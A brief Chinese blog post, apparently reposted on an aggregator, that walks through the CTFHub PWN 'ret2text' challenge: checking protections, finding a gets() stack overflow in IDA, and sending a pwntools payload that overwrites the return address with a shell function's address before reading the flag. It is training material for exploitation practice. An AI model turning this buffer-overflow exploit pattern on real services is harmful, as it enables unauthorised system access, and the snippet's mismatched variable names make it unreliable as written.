CTFHUB(PWN)Ret2Text
2022/2/2 23:17:36
本文主要是介绍CTFHUB(PWN)Ret2Text,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
首先检查保护机制 checksec
64 位 + 什么保护都没开
然后放到ida64中查看
发现gets函数,没有限制数据的长度,容易发生栈溢出
shift+F12 找到bin_sh函数地址
64位程序直接读取偏移量
构造payload,编写exp
from pwn import* p=remote("ip",端口) binsh_addr=地址 payload='a'*(0x70+8)+p64(bin_sh) p.sendline(payload) p.interactive
连接成功后ls
cat flag
这篇关于CTFHUB(PWN)Ret2Text的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-12-25TypeScript基础知识详解
- 2024-12-25安卓NDK 是什么?-icode9专业技术文章分享
- 2024-12-25caddy 可以定义日志到 文件吗?-icode9专业技术文章分享
- 2024-12-25wordfence如何设置密码规则?-icode9专业技术文章分享
- 2024-12-25有哪些方法可以实现 DLL 文件路径的管理?-icode9专业技术文章分享
- 2024-12-25错误信息 "At least one element in the source array could not be cast down to the destination array-icode9专业技术文章分享
- 2024-12-25'flutter' 不是内部或外部命令,也不是可运行的程序 或批处理文件。错误信息提示什么意思?-icode9专业技术文章分享
- 2024-12-25flutter项目 as提示Cannot resolve symbol 'embedding'提示什么意思?-icode9专业技术文章分享
- 2024-12-24怎么切换 Git 项目的远程仓库地址?-icode9专业技术文章分享
- 2024-12-24怎么更改 Git 远程仓库的名称?-icode9专业技术文章分享